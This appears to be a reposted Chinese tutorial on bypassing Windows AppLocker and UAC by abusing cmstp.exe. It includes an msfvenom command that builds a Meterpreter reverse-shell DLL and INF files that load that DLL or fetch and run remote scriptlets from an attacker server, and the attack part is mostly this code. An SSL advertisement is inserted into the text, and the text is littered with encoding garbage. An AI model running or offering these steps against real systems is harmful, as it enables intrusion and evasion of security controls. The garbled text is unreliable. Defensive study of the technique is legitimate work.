這期內(nèi)容當(dāng)中小編將會(huì)給大家?guī)碛嘘P(guān)CMSTP中怎么繞過AppLocker,文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲��。
普蘭ssl適用于網(wǎng)站、小程序/APP、API接口等需要進(jìn)行數(shù)據(jù)傳輸應(yīng)用場景,ssl證書未來市場廣闊���!成為創(chuàng)新互聯(lián)的ssl證書銷售渠道,可以享受市場價(jià)格4-6折優(yōu)惠��!如果有意向歡迎電話聯(lián)系或者加微信:18982081108(備注:SSL證書合作)期待與您的合作��!
CMSTP是一個(gè)與Microsoft連接管理器配置文件安裝程序關(guān)聯(lián)的二進(jìn)制文件���。它接受INF文件�����,這些文件可以通過惡意命令武器化,以腳本(SCT)和DLL的形式執(zhí)行任意代碼���。它是一個(gè)受信任的Microsoft二進(jìn)制文件��,位于以下兩個(gè)Windows目錄中�。
C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe
AppLocker默認(rèn)規(guī)則允許在這些文件夾中執(zhí)行二進(jìn)制文件,因此我們可以用它來作為bypass的一種方法�。該方法最初是由Oddvar Moe發(fā)現(xiàn)的,使用這個(gè)二進(jìn)制文件可以繞過AppLocker和UAC���,具體可以參閱他的博文���。
DLL
通過Metasploit Framework的msfvenom生成惡意DLL文件。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=4444 -f dll > /root/Desktop/pentestlab.dll
INF文件的RegisterOCXSection需要包含惡意DLL文件的本地路徑或遠(yuǎn)程執(zhí)行的WebDAV位置����。
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"
Metasploit multi/handler模塊需要配置為接收連接。
當(dāng)惡意INF文件與cmstp一起提供時(shí)�,代碼將會(huì)在后臺(tái)執(zhí)行。
cmstp.exe /s cmstp.inf
Meterpreter會(huì)話將從DLL執(zhí)行中打開�����。
SCT
除了DLL文件外����,cmstp還能夠運(yùn)行SCT文件���,這在紅隊(duì)操作中擴(kuò)展了二進(jìn)制的可用性。 Nick Tyrer最初通過Twitter展示了這種能力�。
Nick Tyrer還編寫了一個(gè)名為powersct.sct的scriptlet,可以將其用作執(zhí)行PowerShell命令的備選解決方案����,以應(yīng)對(duì)本機(jī)PowerShell被阻止的情況。UnRegisterOCXSection需要包含scriptlet的URL���。最終的INF文件需要包含以下內(nèi)容:
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/powersct.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"
當(dāng)INF文件被執(zhí)行一個(gè)新的窗口將打開�����,這將允許用戶執(zhí)行PowerShell命令���。
cmstp.exe /s cmstp.inf
代碼執(zhí)行也可以通過使用scriptlet來調(diào)用惡意可執(zhí)行文件。INF文件需要包含scriptlet的遠(yuǎn)程位置�����。
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/pentestlab.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"
在執(zhí)行INF文件時(shí)�����,將會(huì)打開一個(gè)新的命令提示符窗口���,這表示代碼已被成功執(zhí)行����。
成功獲取到一個(gè)Meterpreter會(huì)話����。
總結(jié)
使用CMSTP二進(jìn)制來繞過Apple限制和代碼執(zhí)行。CMSTP需要INF文件并在執(zhí)行時(shí)生成一個(gè)CMP文件���,它是連接管理器設(shè)置文件�����。因此�����,如果惡意攻擊者已經(jīng)開始使用此技術(shù)��,且CMSTP.EXE二進(jìn)制無法被AppLocker規(guī)則阻止的情況下����,則需要將這兩個(gè)文件作為IoC進(jìn)行監(jiān)視。
上述就是小編為大家分享的CMSTP中怎么繞過AppLocker了���,如果剛好有類似的疑惑���,不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識(shí)����,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。
網(wǎng)頁標(biāo)題:CMSTP中怎么繞過AppLocker
轉(zhuǎn)載源于:
http://weahome.cn/article/giecde.html
重慶分公司
重慶分公司
